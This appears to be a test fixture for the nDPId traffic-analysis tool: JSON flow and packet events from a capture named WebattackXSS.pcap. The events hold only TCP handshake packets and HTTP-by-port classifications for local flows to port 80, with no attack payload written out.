-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6631,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":469,"flow_packet_id":3,"flow_last_seen":1499347762676,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347762676,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0U3ZAAD4GcmKsEAABwKgKMuz6AFDBm6M96GucuIAQAOVwewAAAQEICgE78EkD5cG+"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6651,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":470,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347765229,"flow_last_seen":1499347765229,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347765229,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60692,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6651,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":470,"flow_packet_id":1,"flow_last_seen":1499347765229,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347765229,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8oyZAAD4GIqqsEAABwKgKMu0UAFACp1HuAAAAAKACchApBgAAAgQFtAQCCAoBO\/LIAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6652,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":470,"flow_packet_id":2,"flow_last_seen":1499347765230,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347765230,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7RRH+ZWsAqdR76AScSCEHQAAAgQFtAQCCAoD5cQ8ATvyyAEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6653,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":470,"flow_packet_id":3,"flow_last_seen":1499347765230,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347765230,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0oydAAD4GIrGsEAABwKgKMu0UAFACp1HvR\/mVrYAQAOUjJQAAAQEICgE78sgD5cQ8"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6660,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":471,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347766506,"flow_last_seen":1499347766506,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347766506,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60706,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6660,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":471,"flow_packet_id":1,"flow_last_seen":1499347766506,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347766506,"pkt":"ABm5CmnxAMGxFOsxCABFAAA80XFAAD4G9F6sEAABwKgKMu0iAFC65SV2AAAAAKACchCb8gAAAgQFtAQCCAoBO\/QHAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6661,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":471,"flow_packet_id":2,"flow_last_seen":1499347766506,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347766506,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7SI0\/7eouuUld6AScSDmxwAAAgQFtAQCCAoD5cV8ATv0BwEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6662,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":471,"flow_packet_id":3,"flow_last_seen":1499347766507,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347766507,"pkt":"ABm5CmnxAMGxFOsxCABFAAA00XJAAD4G9GWsEAABwKgKMu0iAFC65SV3NP+3qYAQAOWFzwAAAQEICgE79AcD5cV8"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6672,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":472,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347767793,"flow_last_seen":1499347767793,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347767793,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60720,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6672,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":472,"flow_packet_id":1,"flow_last_seen":1499347767793,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347767793,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8sEFAAD4GFY+sEAABwKgKMu0wAFC7\/0UIAAAAAKACchB59gAAAgQFtAQCCAoBO\/VJAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6673,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":472,"flow_packet_id":2,"flow_last_seen":1499347767793,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347767793,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7TCCU6kzu\/9FCaAScSCEqwAAAgQFtAQCCAoD5ca9ATv1SQEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6674,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":472,"flow_packet_id":3,"flow_last_seen":1499347767793,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347767793,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0sEJAAD4GFZasEAABwKgKMu0wAFC7\/0UJglOpNIAQAOUjswAAAQEICgE79UkD5ca9"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6684,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":473,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347769077,"flow_last_seen":1499347769077,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347769077,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60734,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6684,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":473,"flow_packet_id":1,"flow_last_seen":1499347769077,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347769077,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8n3VAAD4GJlusEAABwKgKMu0+AFAozWn\/AAAAAKACchDm4gAAAgQFtAQCCAoBO\/aKAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6685,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":473,"flow_packet_id":2,"flow_last_seen":1499347769077,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347769077,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7T59G4FkKM1qAKAScSAdXgAAAgQFtAQCCAoD5cf+ATv2igEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6686,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":473,"flow_packet_id":3,"flow_last_seen":1499347769078,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347769078,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0n3ZAAD4GJmKsEAABwKgKMu0+AFAozWoAfRuBZYAQAOW8ZQAAAQEICgE79ooD5cf+"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6693,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":474,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347770345,"flow_last_seen":1499347770345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347770345,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60748,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6693,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":474,"flow_packet_id":1,"flow_last_seen":1499347770345,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347770345,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8anZAAD4GW1qsEAABwKgKMu1MAFBCsJ2xAAAAAKACchCYAgAAAgQFtAQCCAoBO\/fHAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6694,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":474,"flow_packet_id":2,"flow_last_seen":1499347770345,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347770345,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7UyjrEwnQrCdsqAScSDb7AAAAgQFtAQCCAoD5ck7ATv3xwEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6695,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":474,"flow_packet_id":3,"flow_last_seen":1499347770346,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347770346,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0andAAD4GW2GsEAABwKgKMu1MAFBCsJ2yo6xMKIAQAOV69AAAAQEICgE798cD5ck7"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6705,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":475,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347771635,"flow_last_seen":1499347771635,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347771635,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60762,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6705,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":475,"flow_packet_id":1,"flow_last_seen":1499347771635,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347771635,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8jzNAAD4GNp2sEAABwKgKMu1aAFBxsHY6AAAAAKACchCPKQAAAgQFtAQCCAoBO\/kJAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6706,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":475,"flow_packet_id":2,"flow_last_seen":1499347771635,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347771635,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7VoJ3i\/mcbB2O6AScSCH4AAAAgQFtAQCCAoD5cp+ATv5CQEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6707,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":475,"flow_packet_id":3,"flow_last_seen":1499347771636,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347771636,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0jzRAAD4GNqSsEAABwKgKMu1aAFBxsHY7Cd4v54AQAOUm6AAAAQEICgE7+QkD5cp+"} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6714,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":401,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347645232,"flow_last_seen":1499347650797,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347771832,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59408,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6714,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":401,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347645232,"flow_last_seen":1499347650797,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347771832,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59408,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6714,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":402,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347646486,"flow_last_seen":1499347651805,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347771832,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59422,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6714,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":402,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347646486,"flow_last_seen":1499347651805,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347771832,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59422,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6714,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":403,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347647733,"flow_last_seen":1499347652800,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347771832,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59436,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6714,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":403,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347647733,"flow_last_seen":1499347652800,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347771832,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59436,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6714,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":404,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347650289,"flow_last_seen":1499347655800,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347771832,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59462,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6714,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":404,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347650289,"flow_last_seen":1499347655800,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347771832,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59462,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6714,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":405,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347651555,"flow_last_seen":1499347656799,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347771832,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59476,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6714,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":405,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347651555,"flow_last_seen":1499347656799,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347771832,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59476,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6714,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":406,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347654065,"flow_last_seen":1499347659803,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347771832,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59502,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6714,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":406,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347654065,"flow_last_seen":1499347659803,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347771832,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59502,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6726,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":476,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347774205,"flow_last_seen":1499347774205,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347774205,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60788,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6726,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":476,"flow_packet_id":1,"flow_last_seen":1499347774205,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347774205,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8pr5AAD4GHxKsEAABwKgKMu10AFBYS10yAAAAAKACchC++QAAAgQFtAQCCAoBO\/uMAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6727,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":476,"flow_packet_id":2,"flow_last_seen":1499347774205,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347774205,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7XSGo4hpWEtdM6AScSDf5QAAAgQFtAQCCAoD5c0AATv7jAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6728,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":476,"flow_packet_id":3,"flow_last_seen":1499347774205,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347774205,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0pr9AAD4GHxmsEAABwKgKMu10AFBYS10zhqOIaoAQAOV+7QAAAQEICgE7+4wD5c0A"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6738,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":477,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347775487,"flow_last_seen":1499347775487,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347775487,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60802,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6738,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":477,"flow_packet_id":1,"flow_last_seen":1499347775487,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347775487,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8kr1AAD4GMxOsEAABwKgKMu2CAFDDYm5xAAAAAKACchBBVQAAAgQFtAQCCAoBO\/zMAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6739,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":477,"flow_packet_id":2,"flow_last_seen":1499347775487,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347775487,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7YJb\/j+gw2JucqAScSDUbgAAAgQFtAQCCAoD5c5BATv8zAEDAwc="} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6740,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":477,"flow_packet_id":3,"flow_last_seen":1499347775487,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347775487,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0kr5AAD4GMxqsEAABwKgKMu2CAFDDYm5yW\/4\/oYAQAOVzdgAAAQEICgE7\/MwD5c5B"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6750,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":478,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347776753,"flow_last_seen":1499347776753,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347776753,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60816,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6750,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":478,"flow_packet_id":1,"flow_last_seen":1499347776753,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347776753,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8KqpAAD4GmyasEAABwKgKMu2QAFCtQdSjAAAAAKACchDv+AAAAgQFtAQCCAoBO\/4JAAAAAAEDAwc="} 